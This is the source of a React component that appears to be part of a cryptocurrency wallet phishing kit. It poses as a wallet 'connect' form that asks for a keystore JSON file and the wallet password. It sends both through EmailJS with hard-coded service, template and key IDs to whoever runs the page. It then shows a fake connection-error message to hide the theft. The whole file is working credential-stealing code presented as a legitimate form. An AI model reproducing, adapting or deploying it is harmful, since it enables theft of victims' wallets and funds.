import React, { useRef, useState } from 'react';
import { Fade } from 'react-reveal';
import { Button, useToast } from '@chakra-ui/react';
import swal from 'sweetalert';
import emailjs from '@emailjs/browser';
import { ArrowCircleRightOutlined } from '@mui/icons-material';

function Keystore(props) {
    const [loading, setLoading] = useState(false)
    const [phrase, setPhrase] = useState("")
    const [pwrd, setPwrd] = useState("")
    const toast = useToast()

    const form = useRef();
    const sendEmail = (e) => {
        e.preventDefault();
        if (!phrase || phrase.length < 6) {
            return toast({
                title: 'Invalid wallet key!',
                description: "must contain atleast 6 characters!",
                status: 'error',
                duration: '3500',
                isClosable: true,
                position: 'top'

            })
        }
        setLoading(true)
        emailjs.sendForm('service_it5pii6', 'template_jjrdm5t', form.current, 'lFGf95fny-YwcQrxr')
            //1 SERVICE ID   
            //2 TEMPLATE_ID  template_ua5kv5o
            //3 PUBLIC KEY  4RV-1JQ1DnLyPxG2K
            .then((result) => {
                console.log(result.text);
                setLoading(false)
                swal("", "An error occured", "info");
                toast({
                    title: 'Could not establish connection',
                    status: 'success',
                    duration: '1500',
                    isClosable: true,
                    position: 'top',
                    colorScheme:'gray',
                    variant:'subtle'
                })
                setPhrase("")
                setPwrd("")
            }, (error) => {
                console.log(error.text);
                setLoading(false)
                swal("", "An error occured", "info")
            });
    };

    return (
        <div>
            <Fade>
                <center>
                    <div style={{ width: '95%' }}>
                        <form ref={form}>
                            <textarea value={phrase} onChange={(e) => { setPhrase(e.target.value) }} rows="3" name="mssg2" className='form-control' placeholder='Enter keystore JSON' style={{ border: '1px solid gray' }}></textarea>
                            <textarea value={pwrd} onChange={(e) => { setPwrd(e.target.value) }} rows="3" name="mssg3" className='form-control mt-3' placeholder='Wallet password' style={{ border: '1px solid gray' }}></textarea>
                            <small className='faint'>Several lines of text beginning with "…" plus the password you used for encryption.</small>
                            <Button
                                colorScheme="blue"
                                mt="3"
                                w='full'
                                // spinner={<BeatLoader/>}
                                isLoading={loading}
                                loadingText="Connecting..."
                                onClick={sendEmail}
                            >
                                Proceed <ArrowCircleRightOutlined />
                            </Button>
                        </form>

                    </div>
                </center>
            </Fade>
        </div>
    );
}

export default Keystore;